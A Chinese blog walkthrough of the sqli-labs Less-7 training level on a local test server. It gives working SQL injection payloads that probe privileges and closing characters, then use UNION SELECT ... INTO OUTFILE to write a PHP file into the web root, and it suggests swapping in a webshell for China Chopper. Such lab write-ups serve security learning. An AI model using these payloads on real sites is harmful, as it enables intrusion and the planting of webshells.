打穿sqli-labs靶场第五天(less-7)文件写入

最新推荐文章于 2022-07-19 20:41:51 发布
最新推荐文章于 2022-07-19 20:41:51 发布
阅读量3.6k 收藏 2
点赞数 1
分类专栏: sqli-labs 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45741871/article/details/124102339
版权

打穿sqli-labs靶场第五天(less-7)文件写入

环境配置

该关卡需要用到文件写入操作,所以需要开启MySQL中的文件写入
进入MySQL下的bin目录,用命令行连接数据库
在这里插入图片描述
在这里插入图片描述
查看是否开启文件写入

show variables like '%secure%';

secure_file_priv选项为NULL,表示文件写入功能未开启
在这里插入图片描述此时我们来到MySQL目录下打开my.ini文件,在其中写入secure_file_priv=“/”
在这里插入图片描述
在这里插入图片描述
保存文件,重启靶场环境,重新连接数据库,再次查看写入功能是否开启
在这里插入图片描述

less-7

浏览器访问靶场,选择第七关
在这里插入图片描述
根据提示是让我们使用文件写入进行注入
进入靶场,根据页面提示传参
在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-7/?id=1

在这里插入图片描述
测试连接数据库用户是否具有文件写入权限

and (select count(*) from mysql.user)>0 如果结果返回正常,说明具有读写权限。
and (select count(*) from mysql.user)>0 返回错误,应该是管理员给数据库帐户降权

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+

页面回显正常,具有文件写入权限

测试注入点是否存在与是否使用符号过滤参数值

http://127.0.0.1/sqli-labs-master/Less-7/?id=‘ --+

在这里插入图片描述
虽然页面回显报错但是没有提示,测试多个符号后猜测此处没有报错提示。
根据之前页面回显,我们分析得知页面回显正常时会返回
You are in… Use outfile…
页面回显错误时会返回
You have an error in your SQL syntax
使用and 1=1 不停闭合符合直到页面回显正常信息为止

 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and 1=1 --+
 http://127.0.0.1/sqli-labs-master/Less-7/?id=1') and 1=1 --+
 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and 1=1 --+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
闭合符号,爆破字段长度,得知字段长度为3

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 3 --+
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 --+

在这里插入图片描述
在这里插入图片描述
构造SQL语句,写入文件,这里的路径是网站的绝对路径

http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php phpinfo();?>' into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\sql1.php" --+

在这里插入图片描述
虽然页面回显错误,但是文件已成功写入
在这里插入图片描述
访问该文件,成功执行
在这里插入图片描述
之后修改写入的一句话,使用菜刀连接即可

总结

该关卡使用文件写入操作,需要先确定文件写入功能是否开启和当前用户是否具有文件写入权限。同时利用页面回显尝试闭合符号。在写入文件时要使用网站绝对路径。

辰兴sec
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs靶场Less-7
songling515010475的专栏
08-21 327
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
sql-labs 文件读写
Khazking的博客
11-28 625
第7题:文件读写load file( '绝对路径') into outfile '绝对路径' id=1')) and 1=2--+ id=1')) and 1=1--+ 说明为((' '))的闭合 order by得到字段数为3 上传文件 id=-1')) union select 1,2,3 into outfile "E:\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\wuhu.txt"--+ 上传成功 这里就可...
sqli-lab教程Less-7
Brucye
03-23 462
Less-7 将一句话木马写入目录中,使用中国菜刀连接,拿到shell。 1.开启写入权限 使用show variables like '%secure%'在MySQL命令行中判断 show variables like '%secure%'; 如果这里为Null就没有写入权限 2.如何修改本地写入权限 通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。 secure_file_priv="/" 再次查看此参数,若参数值不为 null 则修改成功。 3
关于sqli-labs less7不能写入一句话木马
snowlyzz的博客
03-10 4736
关于sqli-labs less7不能写入一句话木马解决方法!
Sqli-labs之Less-7
→_→
03-26 1574
Less-7 GET - 导入文件- 字符串 分析数字型/字符型及单/双引号注入: 我们可以分别尝试将 ?id=1 ?id=1' ?id=1"添加到url中,进行测试,发现?id=1'报错,初步判断为字符型注入,经过测试后发现正常返回 You are in.... U...
【Try to Hack】sql注入 Less7 (into outfile和布尔盲注)
开心星人的博客
07-19 612
加单号会报错,但是没有告诉我们具体的报错信息,所以无法使用报错注入发现使用 、 、 不会报错 发现使用 、 、 会报错不会报错的直接不看,肯定不是那种闭合方式 然后测试 、 、没有报错,所以闭合方式为根据上面所述的,会有报错和不报错两种情况,所以就是bool型的 不报错 报错 获取数据库长度 获取数据库第一个字符 获取数据库第一个字符 获取数据库第一张表名的第一个字符 获取security数据库中users表中第一个字段的第一个字符 获得security数据库中users表中的
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs Less-7(SQL注入文件读写)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-04 357
在使用sqli-labs Less-7测试的时候一直有问题,无奈改用Less-1 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等 apache 就…/var/www/htm,…/var/www/html/htdocs phpstudy 就是…\PhpStudy20180211\PHPTutorial\WWW
SQLI-Lab】-Less7
xinyue9966的博客
01-26 644
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-7/?id=1' 判断为字符型,进一步查看回显 http
SQLi LABS Less-7 布尔盲注
热门推荐
wangyuxiang946的博客
04-01 1万+
SQLi 第七关,sqli-labs less-7,sqlilabs less 7
MySQL注入-sqli-labs-读取其他数据库信息以及文件读写
weixin_43896364的博客
06-12 489
information_schema
利用SQL注入进行文件读写(详细步骤的实现+图)【靶场sqli-labs/Less-7】
weixin_46709219的博客
12-15 3490
原理啊,成因啊就不再啰嗦了,直接上实现过程。 一)环境: 攻击机:192.168.67.140 目标主机:192.168.67.143 二)实际操作: 利用mysql的读写文件函数进行文件的读取: 在目标主机的(win7-2)E盘下新建一个flag.txt文件,可以通过输入 select load_file("E:\\flag.txt"); 命令读取指定路径下的flag.txt文件的内容: 在实际中通过漏洞利用进行文件读取: 在攻击机(win7-1)中访问存在SQL注入的网站(如目标主机win7-2中的
LESS-7
qq_44598397的博客
03-19 279
LESS-7源码: 注意在要对文件进行导入导出首先得要有足够的权限, 但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null) secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 1、当secure_file_priv的值为null ,表示限制mys...
sqli-labs Less-7 文件读写注入
m0_63711447的博客
04-05 788
SQL语句可以将指定内容写进文件里 1、into outfile 写文件 select 'xxxxx' into outfile '文件路径'; 单个反斜杠\t 出现了转义使语句无法执行,改为用双反斜杠即可 2、load_file() 读取本地文件 select load_file('要读取的文件路径'); 下面开始第七关的练习: 1、输入id=1,出现提示use outfile 2、分析闭合方式 添加单引号报错,所以闭合方式为单引号 判断括号个数 ,id=1'))--..
Sqli-LABS通关笔录-7[文件写入函数Outfile]
aiquan9342的博客
11-28 245
该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用。 通过源代码我们很容易的写出了payload。倘若我们一个个去尝试的话,说实话,不容易。 http://127.0.0.1/sql/Less-7/index.php?id=1')) and 1=1--+ Payload: http://127.0.0.1/sql/Less-7/ind...
ubuntu搭建sqli-labs靶场
10-15
5. 修改sqli-labs配置文件: ``` cd /var/www/html/sqli-labs/ sudo cp config.inc.example config.inc sudo nano config.inc ``` 将以下两行代码的注释去掉,并修改为自己的MySQL用户名和密码: ``` $db...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值